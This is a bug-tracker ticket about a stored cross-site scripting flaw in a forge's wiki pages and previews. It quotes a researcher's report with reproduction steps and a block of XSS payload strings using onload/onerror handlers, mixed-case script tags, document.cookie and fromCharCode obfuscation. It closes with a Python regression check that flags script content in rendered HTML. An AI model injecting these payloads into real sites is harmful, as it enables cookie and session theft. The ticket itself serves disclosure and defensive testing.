- **status**: closed --> code-review
- **private**: Yes --> No


---

**[tickets:#7528] XSS on wiki page and preview**

**Status:** code-review
**Milestone:** forge-jul-11
**Labels:** security p1 
**Created:** Thu Jul 03, 2014 12:31 PM UTC by Chris Tsai
**Last Updated:** Mon Jul 07, 2014 08:29 PM UTC
**Owner:** Dave Brondsema

Confirmed and reproduced here: 
https://sourceforge.net/p/strawhat/private-wiki/Swapnil_XSS/

***This also affects live wiki pages, not just the previews***

Original message from user Swapnil Thaware:

>Respected Authorities,

>My name is Swapnil A. Thaware and I am a Security Researcher from India. I 
>have found a security vulnerability in sourceforge.net. Here I am giving the 
>details of the vulnerability found in sourceforge.net.


>Vulnerability : Stored XSS

>Vulnerability Description : Cross-Site Scripting (XSS) attacks are a type of 
>injection, in which malicious scripts are injected into otherwise benign and 
>trusted web sites. XSS attacks occur when an attacker uses a web application 
>to send malicious code, generally in the form of a browser side script, to a 
>different end user. Flaws that allow these attacks to succeed are quite 
>widespread and occur anywhere a web application uses input from a user within 
>the output it generates without validating or encoding it.

>An attacker can use XSS to send a malicious script to an unsuspecting user. 
>The end user’s browser has no way to know that the script should not be 
>trusted, and will execute the script. Because it thinks the script came from a 
>trusted source, the malicious script can access any cookies, session tokens, 
>or other sensitive information retained by the browser and used with that 
>site. These scripts can even rewrite the content of the HTML page.

>Steps to Reproduce :
>1) Login to Account
>2) Go to wiki Section then Click on Create Page
>3) Write a name
>4) and then put XSS Payload in Content box then click on Preview button.
>5) Boooommmm !! we get the popup

>XSS Payload : 

~~~~
<body onLoad=confirm(0)> "><svg/onload=alert(document.cookie)> ">"<img src=x 
onerror=prompt(document.domain)>"> "><ScRiPt>alert("Hami Hax")<%2FScRiPt> 
"><img src=x onerror=prompt('Xss');> “><img src=x 
onerror=alert(document.cookie)> 
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
 
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
 ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
~~~~


>POC : I added a screenshot in attachment, please kindly check the attachment.


>Kindly let me know when the vulnerability is fixed and I am eligible for any 
>acknowledgement or any reward.
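
A regression check for the wiki page and preview output this ticket describes, as an added example that is not Allura's code: it parses rendered HTML and reports every element or attribute a browser would run as script. The two `render_preview_*` functions and the `preview` class name are hypothetical stand-ins for the real renderer, and the `javascript:` URL check goes beyond the payload in the report.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the opening part of the payload quoted in the report.
REPORTED_PAYLOAD = (
    '<body onLoad=confirm(0)> "><svg/onload=alert(document.cookie)> '
    '">"<img src=x onerror=prompt(document.domain)>"> '
    '"><ScRiPt>alert("Hami Hax")<%2FScRiPt>'
)
URL_ATTRS = {"href", "src", "action", "formaction"}


class ActiveContentAudit(HTMLParser):
    """Record every element or attribute a browser would treat as script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <ScRiPt> and
        # onLoad are matched the same way as their lower-case forms.
        if tag == "script":
            self.findings.append((tag, None))
        for name, value in attrs:
            url = (value or "").strip().lower()
            if name.startswith("on"):
                self.findings.append((tag, name))
            elif name in URL_ATTRS and url.startswith("javascript:"):
                self.findings.append((tag, name))


def audit(rendered_html):
    parser = ActiveContentAudit()
    parser.feed(rendered_html)
    parser.close()
    return parser.findings


def render_preview_raw(content):      # hypothetical: user input echoed as-is
    return '<div class="preview">' + content + "</div>"


def render_preview_escaped(content):  # hypothetical: input HTML-encoded first
    return '<div class="preview">' + html.escape(content) + "</div>"


if __name__ == "__main__":
    print("raw:    ", audit(render_preview_raw(REPORTED_PAYLOAD)))
    print("escaped:", audit(render_preview_escaped(REPORTED_PAYLOAD)))
```

Run against both the preview response and the saved page, since the ticket notes that live wiki pages are affected as well.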

